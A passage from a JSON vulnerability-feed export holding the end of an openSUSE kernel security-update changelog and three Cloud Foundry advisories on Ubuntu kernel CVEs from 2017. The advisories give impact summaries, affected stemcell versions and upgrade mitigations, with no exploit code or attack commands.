iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - kabi/severities: ignore nfs_pgio_data_destroy\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: async_pf: Fix #DF due to inject &quot;Page not Present&quot; and &quot;Page Ready&quot;\n exceptions simultaneously (bsc#1061017).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: math-emu: &amp;lt;MAXA|MINA&amp;gt;.&amp;lt;D|S&amp;gt;: Fix cases of both\n infinite inputs (bnc#1012382).\n - mips: math-emu: &amp;lt;MAXA|MINA&amp;gt;.&amp;lt;D|S&amp;gt;: Fix cases of input values\n with opposite signs (bnc#1012382).\n - mips: math-emu: &amp;lt;MAX|MAXA|MIN|MINA&amp;gt;.&amp;lt;D|S&amp;gt;: Fix cases of both\n inputs zero (bnc#1012382).\n - mips: math-emu: &amp;lt;MAX|MAXA|MIN|MINA&amp;gt;.&amp;lt;D|S&amp;gt;: Fix quiet NaN\n propagation (bnc#1012382).\n - mips: math-emu: &amp;lt;MAX|MIN&amp;gt;.&amp;lt;D|S&amp;gt;: Fix cases of both inputs\n negative (bnc#1012382).\n - mips: math-emu: MINA.&amp;lt;D|S&amp;gt;: Fix some cases of infinity and zero\n inputs (bnc#1012382).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - Revert &quot;net: fix percpu memory leaks&quot; (bnc#1012382).\n - Revert &quot;net: phy: Correctly process PHY_HALTED in phy_stop_machine()&quot;\n (bnc#1012382).\n - Revert &quot;net: use lib/percpu_counter API for fragmentation mem\n accounting&quot; (bnc#1012382).\n - scsi: ILLEGAL REQUEST + ASC==27 =&amp;gt; target failure (bsc#1059465).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of &quot;new&quot; 64 bit SCSI LUN (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - Workaround for kABI compatibility with DP-MST patches (bsc#1055493).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - xfs/dmapi: fix incorrect file-&amp;gt;f_path.dentry-&amp;gt;d_inode usage\n (bsc#1055896).\n\n", "edition": 1, "modified": "2017-10-17T15:09:40", "published": "2017-10-17T15:09:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00018.html", "id": "OPENSUSE-SU-2017:2739-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:44", "bulletinFamily": "software", "cvelist": ["CVE-2017-12762", "CVE-2017-8831", "CVE-2017-1000251", "CVE-2017-10663"], "description": "# \n\n# Severity\n\nHigh\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3420-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nIt was discovered that a buffer overflow existed in the Bluetooth stack of the Linux kernel when handling L2CAP configuration responses. A physically proximate attacker could use this to cause a denial of service (system crash). ([CVE-2017-1000251](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000251>))\n\nIt was discovered that the Flash-Friendly File System (f2fs) implementation in the Linux kernel did not properly validate superblock metadata. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-10663](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-10663>))\n\nIt was discovered that a buffer overflow existed in the ioctl handling code in the ISDN subsystem of the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-12762](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12762>))\n\nPengfei Wang discovered that a race condition existed in the NXP SAA7164 TV Decoder driver for the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-8831](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-8831>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.38\n * 3363.x versions prior to 3363.37\n * 3421.x versions prior to 3421.26\n * 3445.x versions prior to 3445.11\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3312.x versions prior to 3312.38\n * Upgrade 3363.x versions prior to 3363.37\n * Upgrade 3421.x versions prior to 3421.26\n * Upgrade 3445.x versions prior to 3445.11\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3420-2](<http://www.ubuntu.com/usn/usn-3420-2/>)\n * [CVE-2017-1000251](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-1000251>)\n * [CVE-2017-10663](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-10663>)\n * [CVE-2017-12762](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12762>)\n * [CVE-2017-8831](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-8831>)\n", "edition": 5, "modified": "2017-09-21T00:00:00", "published": "2017-09-21T00:00:00", "id": "CFOUNDRY:01D42C16D02067C2EABD907705968B25", "href": "https://www.cloudfoundry.org/blog/usn-3420-2/", "title": "USN-3420-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "software", "cvelist": ["CVE-2017-14051", "CVE-2017-14489", "CVE-2017-14991", "CVE-2017-9984", "CVE-2017-15537", "CVE-2017-12192", "CVE-2017-9985", "CVE-2017-10911", "CVE-2017-14156", "CVE-2017-14340", "CVE-2017-12153", "CVE-2017-12154"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3469-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nAnthony Perard discovered that the Xen virtual block driver did not properly initialize some data structures before passing them to user space. A local attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs. ([CVE-2017-10911](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-10911>))\n\nBo Zhang discovered that the netlink wireless configuration interface in the Linux kernel did not properly validate attributes when handling certain requests. A local attacker with the CAP_NET_ADMIN could use this to cause a denial of service (system crash). ([CVE-2017-12153](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12153>))\n\nIt was discovered that the nested KVM implementation in the Linux kernel in some situations did not properly prevent second level guests from reading and writing the hardware CR8 register. A local attacker in a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux kernel did not properly restrict key reads on negatively instantiated keys. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-12192](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12192>))\n\nIt was discovered that an integer overflow existed in the sysfs interface for the QLogic 24xx+ series SCSI driver in the Linux kernel. A local privileged attacker could use this to cause a denial of service (system crash). ([CVE-2017-14051](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14051>))\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux kernel did not properly initialize a data structure returned to user space. A local attacker could use this to expose sensitive information (kernel memory). ([CVE-2017-14156](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14156>))\n\nDave Chinner discovered that the XFS filesystem did not enforce that the realtime inode flag was settable only on filesystems on a realtime device. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-14340](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14340>))\n\nChunYu Wang discovered that the iSCSI transport implementation in the Linux kernel did not properly validate data structures. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-14489](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14489>))\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not properly initialize data returned to user space in some situations. A local attacker could use this to expose sensitive information (kernel memory). ([CVE-2017-14991](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14991>))\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem in the Linux kernel did not properly handle attempts to set reserved bits in a task\u2019s extended state (xstate) area. A local attacker could use this to cause a denial of service (system crash). ([CVE-2017-15537](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-15537>))\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device driver in the Linux kernel contained race conditions when fetching from the ring-buffer. A local attacker could use this to cause a denial of service (infinite loop). ([CVE-2017-9984](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9984>), [CVE-2017-9985](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9985>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3421.x versions prior to 3421.32\n * 3445.x versions prior to 3445.17\n * 3468.x versions prior to 3468.11\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3421.x versions prior to 3421.32\n * Upgrade 3445.x versions prior to 3445.17\n * Upgrade 3468.x versions prior to 3468.11\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3469-2](<http://www.ubuntu.com/usn/usn-3469-2/>)\n * [CVE-2017-10911](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-10911>)\n * [CVE-2017-12153](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12153>)\n * [CVE-2017-12192](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12192>)\n * [CVE-2017-14051](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14051>)\n * [CVE-2017-14156](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14156>)\n * [CVE-2017-14340](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14340>)\n * [CVE-2017-14489](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14489>)\n * [CVE-2017-14991](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-14991>)\n * [CVE-2017-15537](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-15537>)\n * [CVE-2017-9984](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9984>)\n * [CVE-2017-9985](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-9985>)\n * [CVE-2017-12154](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-12154>)\n", "edition": 5, "modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "id": "CFOUNDRY:14981E32944F89BB69AF2D0158A379F0", "href": "https://www.cloudfoundry.org/blog/usn-3469-2/", "title": "USN-3469-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:00", "bulletinFamily": "software", "cvelist": ["CVE-2017-11176", "CVE-2017-7495", "CVE-2017-7541", "CVE-2015-7837"], "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n\n# Description\n\nUSN-3405-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 LTS.\n\nIt was discovered that a use-after-free vulnerability existed in the POSIX message queue implementation in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-11176](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-11176>))\n\nHuang Weller discovered that the ext4 filesystem implementation in the Linux kernel mishandled a needs-flushing-before-commit list. A local attacker could use this to expose sensitive information. ([CVE-2017-7495](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-7495>))\n\nIt was discovered that a buffer overflow existed in the Broadcom FullMAC WLAN driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. ([CVE-2017-7541](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-7541>))\n\nIt was discovered that the Linux kernel did not honor the UEFI secure boot mode when performing a kexec operation. A local attacker could use this to bypass secure boot restrictions. ([CVE-2015-7837](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2015-7837>))\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH stemcells are vulnerable, including: \n * 3312.x versions prior to 3312.38\n * 3363.x versions prior to 3363.37\n * 3421.x versions prior to 3421.26\n * 3445.x versions prior to 3445.11\n * All other stemcells not listed.\n\n# Mitigation\n\nOSS users are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH stemcells: \n * Upgrade 3312.x versions prior to 3312.38\n * Upgrade 3363.x versions prior to 3363.37\n * Upgrade 3421.x versions prior to 3421.26\n * Upgrade 3445.x versions prior to 3445.11\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io>).\n\n# References\n\n * [USN-3405-2](<http://www.ubuntu.com/usn/usn-3405-2/>)\n * [CVE-2017-11176](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-11176>)\n * [CVE-2017-7495](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-7495>)\n * [CVE-2017-7541](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2017-7541>)\n * [CVE-2015-7837](<http://people.ubuntu.com/~ubuntu-security/cve/CVE-2015-7837>)\n", "edition": 6, "modified": "2017-09-21T00:00:00", "published": "2017-09-21T00:00:00", "id": "CFOUNDRY:9D1D2721EB965138C5B62A17BAC259EF", "href": "https://www.cloudfoundry.org/blog/usn-3405-2/", "title": "USN-3405-2: Linux kernel (Xenial HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}